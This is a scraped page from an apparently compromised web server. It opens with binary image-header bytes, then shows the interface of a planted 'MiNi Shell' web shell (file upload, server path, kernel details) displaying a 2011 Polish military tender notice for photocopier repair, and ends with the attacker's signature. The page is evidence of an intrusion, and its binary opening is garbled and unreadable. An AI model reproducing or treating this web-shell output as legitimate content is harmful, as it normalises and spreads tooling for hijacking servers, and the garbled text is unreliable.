JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110215/53629-N-2011.html

<p class="kh_header"><b>Dęblin: Naprawa i konserwacja kserokopiarek dla Jednostki Wojskowej Nr 4219 w Dęblinie - 7/11/N</b><br>
<b>Numer ogłoszenia: 53629 - 2011; data zamieszczenia: 15.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4219 , 08-521 Dęblin, woj. lubelskie, tel. 0-81 5519510, 5517818, faks 0-81 5519536.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa i konserwacja kserokopiarek dla Jednostki Wojskowej Nr 4219 w Dęblinie - 7/11/N.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług naprawy i bieżącej konserwacji kserokopiarek dla Jednostki Wojskowej Nr 4219 w Dęblinie - 7/11/N. Szczegółowy opis przedmiotu zamówienia znajduje się w formularzu ofertowym - załącznik nr 1 do SIWZ.
2.	Wykaz kserokopiarek podlegających naprawie i konserwacji:
LP	nazwa	nr seryjny	rok zakupu
1	KSEROKOP. A-3 TOSHIBA 1550	FA 1998782	1999
2	KSEROKOP. A-3 TOSHIBA 1550	876779	1998
3	KSEROKOP. CYFR. KYDCERA MITA KM-1525 A-3	X3014794	2003
4	KOPIARKA PANASONIC DP-8016	HHP54R00013	2008
5	KOPIARKA PANASONIC DP-8016	HHP54R00007	2008
6	KSEROKOPIARKA CYFROWA CANON PC-D340	EZR98138	2009
7	KOPIARKA SAMSUNG SCX-4216F/PL	B1BXA00095	2005
8	KSEROKOPIARKA RICOH AF 220	2404202373	2005
9	KSEROKOPIARKA TOSHIBA ED-1550 F.A-3	CAK 876601	1998
10	KSEROKOPIARKA EP-2030 MINOLTA F.A-3	21701792	2000
11	KSEROKOPIARKA TOSHIBA 2860 MJD	CRD 966401	1999
12	KSEROKOPIARKA KM-1525 FA-3	B/N	2002
13	KSEROKOPIARKA EP-2030 A-3	21701794	1999
14	KOPIARKA RICOH/GESTETNER 2635T	A3696310046	2004
15	KOPIARKA RICOH/GESTETNER 2732 ZTD	A7498840218	2004
16	KSEROKOPIARKA RICOCH AF-200/250	B/N	2004
17	KSEROKOPIARKA RICOCH AF-200/250	8060097	2004
18	KSEROKOPIARKA KONICA MINOLTA  A-3 C-450	211703179	2005
19	KSEROKOPIARKA TOSHIBA E-STUDIO 160	CJK511932	2005
20	KSEROKOPIARKA TOSHIBA E-STUDIO 161	CEH551710	2005
21	KOPIARKA TOSHIBA E-STUDIO 163	CHI670938	2006
22	KOPIARKA TOSHIBA E-STUDIO 163	CHI670860	2006
23	KOPIARKA TOSHIBA E-STUDIO 163	CHI670929	2006
24	KOPIARKA TOSHIBA E-STUDIO 163	CHI670857	2006
25	KSEROKOPIARKA TOSHIBA E-STUDIO 163	CHA720789	2007
26	KSEROKOPIARKA TOSHIBA E-STUDIO 163	CHA721210	2007
27	KSEROKOPIARKA TOSHIBA E-STUDIO 163	CHL697525	2007
28	KSEROKOPIARKA TOSHIBA E-STUDIO 163	CHA721048	2007
29	KSEROKOPIARKA OLIVETTID-KOPIA 16W	65303112	2006
30	KSEROKOPIARKA TOSHIBA E-STUDIO 161	CEH551898	2006
31	KSEROKOPIARKA TOSHIBA E-STUDIO 161	CEH551657	2006
32	KSEROKOP. AF 1515	K2058602012	
33	KSEROKOP. A-3	2833	
34	KSEROKOPIARKA OLIVETTI	PWB6705500	
35	KSEROKOP. INASHUATEC 3913 A-3	H4207100070	
36	KOPIARKA PANASONIC DP-8016	HHP54R00004	2008
37	KOPIARKA PANASONIC DP-8016	HHP54R00008	2008
38	KOPIARKA PANASONIC DP-8016	HHP54R00015	2008
39	KOPIARKA PANASONIC DP-8016 Z ADF DA-AS 181 	IHP54R00062	2008
40	KOPIARKA PANASONIC DP-8016 Z ADF DA-AS 181 	IHP54R00064	2008
41	KOPIARKA PANASONIC DP-8016 Z ADF DA-AS 181 	IHP54R00060	2008
42	KOPIARKA PANASONIC DP-8016 Z ADF DA-AS 181 	IHP54R00065	2008
43	KOPIARKA PANASONIC DP-8016 Z ADF DA-AS 181 	IHP54R00024	2008
3. Konserwacja kserokopiarek, w zależności od modelu urządzenia (typu), ma obejmować co najmniej następujące czynności:
1) demontaż obudów zewnętrznych i wewnętrznych,
2) demontaż sekcji grzejnej,
3) demontaż sekcji wywołującej,
4) demontaż sekcji głównego ładownika,
5) demontaż zespołu czyszczącego,
6) demontaż filarów,
7) demontaż sekcji przenoszenia i oddzielania,
8) czyszczenie wnętrza odkurzaczem (usunięcie pyłów papieru, tonera oraz kurzu),
9) czyszczenie zespołu czyszczącego bębna,
10) czyszczenie zespołu optyki,
11) czyszczenie kaset papieru,
12) czyszczenie filtrów,
13) czyszczenie drogi transportu papieru,
14) czyszczenie napędu głównego,
15) czyszczenie sekcji grzejnej,
16) czyszczenie sekcji pobierania papieru,
17) montaż poszczególnych zespołów, sekcji oraz obudów (dotyczy elementów wyszczególnionych w pkt 1-7),
18) sprawdzenie działania kserokopiarki po konserwacji,
19) regulacja jakości kopii,
20) regulacja ekspozycji,
21) regulacja dozowania tonera,
22) wymiana materiałów eksploatacyjnych zgodnie z zaleceniami producenta,
23) spisanie stanu licznika kserokopiarki.
4. Wymiana niesprawnych lub zużytych części eksploatacyjnych (z wyjątkiem papieru 
i tonerów, które nie wchodzą w zakres niniejszego przedmiotu zamówienia), może nastąpić tylko po uprzednim, pisemnym uzgodnieniu kosztu (ceny) wymienianej części 
z Zamawiającym. Wykonawca zobowiązany jest użyć fabrycznie nowych części eksploatacyjnych (części nie mogą być po regeneracji)
5. Zamawiający zastrzega sobie możliwość zmniejszenia liczby kserokopiarek podlegających konserwacji oraz zmniejszenia częstotliwości konserwacji co skutkować będzie odpowiednim mniejszeniem wysokości kwoty należnej za wykonane usługi.
7. Rozliczenie za wykonane usługi nastąpi po każdorazowej konserwacji.
8. Faktura na konserwację kserokopiarki powinna zawierać 
-  ustaloną stawkę konserwacji dla wszystkich w/w kserokopiarek 
- stan licznika kserokopiarki
-  każda faktura opiewa na jedną konserwację.
Faktura na naprawę kserokopiarek powinna zawierać
-  ustaloną stawkę roboczogodziny dla wszystkich w/w  kserokopiarek 
-  cenę wymienionych części
- stan licznika kserokopiarki
Razem naprawie i konserwacji podlega 43 sztuk kserokopiarek z czego 1 kserokopiarka jest na gwarancji i konieczna jest obsługa gwaranta (gwarancja do dnia 26.11.2011 r. -  KSEROKOPIARKA CYFROWA CANON PC-D340)
9. Na wykonane usługi Wykonawca udziela 12 miesięcznej gwarancji.
10. Czas realizacji zgłoszenia w przypadku konserwacji  3dni od dnia zgłoszenia. 
11.Naprawa sprzętu musi nastąpić w terminie 7 dni roboczych od uzyskania zgody Zamawiającego. Do naprawy kserokopiarek wykonawca zobowiązany jest użyć fabrycznie nowych części zamiennych (nie mogą być to części po regeneracji).
12. Po dokonaniu naprawy Wykonawca dokona regulacji i sprawdzi działanie kserokopiarki.
13. Wszelkie konserwacje i naprawy wykonywane będą u danego użytkowenika urządzenia. 
W szczególnych przypadkach naprawa może być wykonana, za zgodą Zamawiającego, 
u Wykonawcy (naprawa warsztatowa).
14. W przypadku, kiedy czas naprawy przekroczy ustalony termin, Wykonawca na życzenie Zamawiającego, udostępni kserokopiarkę zastępczą.

15.Wykonawca będzie wykonywał prace związane z realizacją umowy w dni robocze (poniedziałek - piątek) w godzinach 800-1500 .
16.Wykonawca we własnym zakresie zapewni środki, materiały, narzędzia i urządzenia konieczne do konserwacji i napraw. Zamawiający nie zwraca ich kosztów.
17.Wykonawca musi zabezpieczyć miejsce konserwacji lub naprawy tak, aby nie wystąpiły szkody lub zniszczenia oraz nie wystąpiło zagrożenie dla pracowników Zamawiającego. W razie ich wystąpienia ponosi pełną odpowiedzialność cywilną za powstałe szkody lub zniszczenia, w tym także wyrządzone osobom trzecim..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.31.30.00-3, 50.31.32.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców ww warunku dokonana bedzię z godnie z formuła spełnia nie spelnia na podstawie treści złożonego oświadczenia w trybie art. 22 ust. 1 ustawy Pzp 9zalacznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców ww warunku dokonana bedzię z godnie z formuła spełnia nie spełnia na podstawie treści złożonego oświadczenia w trybie art. 22 ust. 1 ustawy Pzp 9zalacznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców ww warunku dokonana będzie z godnie z formuła spełnia nie spełnia na podstawie treści złożonego oświadczenia w trybie art. 22 ust. 1 ustawy Pzp 9zalacznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców ww warunku dokonana będzie z godnie z formuła spełnia nie spełnia na podstawie treści złożonego oświadczenia w trybie art. 22 ust. 1 ustawy Pzp 9zalacznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców ww warunku dokonana będzie z godnie z formuła spełnia nie spełnia na podstawie treści złożonego oświadczenia w trybie art. 22 ust. 1 ustawy Pzp 9zalacznik nr 2 do siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4219 w Dęblinie lotnisko Budynek 205, pok. 4, 08-521 Dęblin. pocztą po wpłacie  13,00 zł na konto 86101013390000971391500000. Pisemną prośbę należy przesłać  łącznie z dowodem wplat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2011 godzina 12:00, miejsce: kancelaria jawna (pok. nr 20) Jednostki Wojskowej 4219 , lotnisko bud. 205, 08-521 Dęblin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com